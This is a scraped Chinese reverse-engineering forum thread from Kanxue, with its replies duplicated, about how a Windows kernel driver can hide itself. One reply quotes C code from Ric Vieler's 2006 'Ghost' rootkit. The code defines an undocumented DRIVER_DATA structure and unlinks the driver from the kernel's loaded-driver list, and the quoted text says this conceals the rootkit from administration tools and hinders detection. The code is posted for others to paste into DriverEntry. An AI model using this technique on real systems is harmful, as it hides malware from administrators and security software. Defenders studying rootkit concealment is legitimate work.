关于驱动隐藏自己的方法-软件逆向-看雪-安全社区|安全招聘|kanxue.com

最新回复 (3)
hawkish 雪币： 258 活跃值： (40) 能力值： ( LV4，RANK：50 ) 在线值：发帖 6 回帖 137 粉丝 0 关注私信	hawkish 1 2 楼隐藏sys文件本身还是隐藏它生成的设备啊? 隐藏设备可以参考下面的代码： DRIVER_DATA is part of an undocumented, internal Windows operating system structure. Among other things, the structure holds the pointers to the next and previous device drivers in the device driver list. Because the rootkit developed in this chapter is implemented as a device driver, removing the rootkit’s entry from the device driver list will conceal it from system administration utilities, making detection much more difficult: // Copyright Ric Vieler, 2006 // Support header for Ghost.c #ifndef _GHOST_H_ #define _GHOST_H_ typedef BOOLEAN BOOL; typedef unsigned long DWORD; typedef DWORD* PDWORD; typedef unsigned long ULONG; typedef unsigned short WORD; typedef unsigned char BYTE; typedef struct _DRIVER_DATA { LIST_ENTRY listEntry; DWORD unknown1; DWORD unknown2; DWORD unknown3; DWORD unknown4; DWORD unknown5; DWORD unknown6; DWORD unknown7; UNICODE_STRING path; UNICODE_STRING name; } DRIVER_DATA; #endif //DriverEntry函数中加入下面的代码 // Hide this driver driverData = ((DRIVER_DATA)((DWORD)pDriverObject + 20)); if( driverData != NULL ) { // unlink this driver entry from the driver list ((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; driverData->listEntry.Flink->Blink = driverData->listEntry.Blink; } 2010-5-17 20:26 0
wufenjack 雪币： 219 活跃值： (47) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 76 粉丝 0 关注私信	wufenjack 3 楼楼上的代码，没太看明白，呵呵，学习，希望能再给详细点的解释下 2010-5-17 21:40 0
jokersky 雪币： 132 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 189 粉丝 1 关注私信	jokersky 1 4 楼 2567696 2010-10-28 07:12 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

最新回复 (3)
hawkish 雪币： 258 活跃值： (40) 能力值： ( LV4，RANK：50 ) 在线值：发帖 6 回帖 137 粉丝 0 关注私信	hawkish 1 2 楼隐藏sys文件本身还是隐藏它生成的设备啊? 隐藏设备可以参考下面的代码： DRIVER_DATA is part of an undocumented, internal Windows operating system structure. Among other things, the structure holds the pointers to the next and previous device drivers in the device driver list. Because the rootkit developed in this chapter is implemented as a device driver, removing the rootkit’s entry from the device driver list will conceal it from system administration utilities, making detection much more difficult: // Copyright Ric Vieler, 2006 // Support header for Ghost.c #ifndef _GHOST_H_ #define _GHOST_H_ typedef BOOLEAN BOOL; typedef unsigned long DWORD; typedef DWORD* PDWORD; typedef unsigned long ULONG; typedef unsigned short WORD; typedef unsigned char BYTE; typedef struct _DRIVER_DATA { LIST_ENTRY listEntry; DWORD unknown1; DWORD unknown2; DWORD unknown3; DWORD unknown4; DWORD unknown5; DWORD unknown6; DWORD unknown7; UNICODE_STRING path; UNICODE_STRING name; } DRIVER_DATA; #endif //DriverEntry函数中加入下面的代码 // Hide this driver driverData = ((DRIVER_DATA)((DWORD)pDriverObject + 20)); if( driverData != NULL ) { // unlink this driver entry from the driver list ((PDWORD)driverData->listEntry.Blink) = (DWORD)driverData->listEntry.Flink; driverData->listEntry.Flink->Blink = driverData->listEntry.Blink; } 2010-5-17 20:26 0
wufenjack 雪币： 219 活跃值： (47) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 76 粉丝 0 关注私信	wufenjack 3 楼楼上的代码，没太看明白，呵呵，学习，希望能再给详细点的解释下 2010-5-17 21:40 0
jokersky 雪币： 132 活跃值： (30) 能力值： ( LV4，RANK：50 ) 在线值：发帖 13 回帖 189 粉丝 1 关注私信	jokersky 1 4 楼 2567696 2010-10-28 07:12 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复